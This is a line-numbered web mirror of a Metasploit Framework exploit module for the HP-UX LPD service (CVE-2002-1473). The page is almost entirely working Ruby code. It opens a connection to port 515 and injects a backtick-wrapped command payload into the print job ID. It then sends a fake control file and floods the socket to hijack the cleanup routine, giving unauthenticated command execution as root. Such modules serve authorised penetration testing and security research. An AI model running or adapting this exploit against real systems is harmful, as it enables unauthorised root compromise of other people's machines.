Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/hpux/lpd/cleanup_exec.rb
19534 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'English'

7
class MetasploitModule < Msf::Exploit::Remote

8
  Rank = ExcellentRanking

9


10
  include Msf::Exploit::Remote::Tcp

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'HP-UX LPD Command Execution',

17
        'Description' => %q{

18
          This exploit abuses an unpublished vulnerability in the

19
          HP-UX LPD service. This flaw allows an unauthenticated

20
          attacker to execute arbitrary commands with the privileges

21
          of the root user. The LPD service is only exploitable when

22
          the address of the attacking system can be resolved by the

23
          target. This vulnerability was silently patched with the

24
          buffer overflow flaws addressed in HP Security Bulletin

25
          HPSBUX0208-213.

26
        },

27
        'Author' => [ 'hdm' ],

28
        'References' => [

29
          ['CVE', '2002-1473'],

30
          ['OSVDB', '9638'],

31
          ['URL', 'https://web.archive.org/web/20041213153521/http://archives.neohapsis.com/archives/hp/2002-q3/0064.html'],

32
        ],

33
        'Platform' => %w[hpux unix],

34
        'Arch' => ARCH_CMD,

35
        'Payload' => {

36
          'Space' => 200,

37
          'DisableNops' => true,

38
          'BadChars' => "\x00\x09\x20\x2f",

39
          'Compat' => {

40
            'PayloadType' => 'cmd',

41
            'RequiredCmd' => 'generic perl telnet'

42
          }

43
        },

44
        'Targets' => [

45
          [ 'Automatic Target', {}]

46
        ],

47
        'Privileged' => true,

48
        'DefaultTarget' => 0,

49
        'DisclosureDate' => '2002-08-28',

50
        'Notes' => {

51
          'Stability' => [CRASH_SAFE],

52
          'SideEffects' => [IOC_IN_LOGS],

53
          'Reliability' => [REPEATABLE_SESSION]

54
        }

55
      )

56
    )

57


58
    register_options([

59
      Opt::RPORT(515)

60
    ])

61
  end

62


63
  def exploit

64
    # The job ID is squashed down to three decimal digits

65
    jid = ($PROCESS_ID % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]

66


67
    # Connect to the LPD service

68
    connect

69


70
    print_status('Sending our job request with embedded command string...')

71


72
    # Send the job request with the encoded command

73
    sock.put("\x02#{rand_text_alphanumeric(3)}#{jid}`#{payload.encoded}`\n")

74


75
    res = sock.get_once(1)

76
    if !(res && res[0, 1] == "\x00")

77
      fail_with(Failure::Unknown, 'The target did not accept our job request')

78
    end

79


80
    print_status('Sending our fake control file...')

81
    sock.put("\x02 32 cfA#{rand_text_alphanumeric(8)}\n")

82


83
    res = sock.get_once(1)

84
    if !(res && res[0, 1] == "\x00")

85
      fail_with(Failure::Unknown, 'The target did not accept our control file')

86
    end

87


88
    print_status('Forcing an error and hijacking the cleanup routine...')

89


90
    begin

91
      sock.put(rand_text_alphanumeric(16384))

92
    rescue StandardError

93
      # request may fail, this is expected

94
    end

95
  ensure

96
    disconnect unless sock.nil?

97
  end

98
end

99


100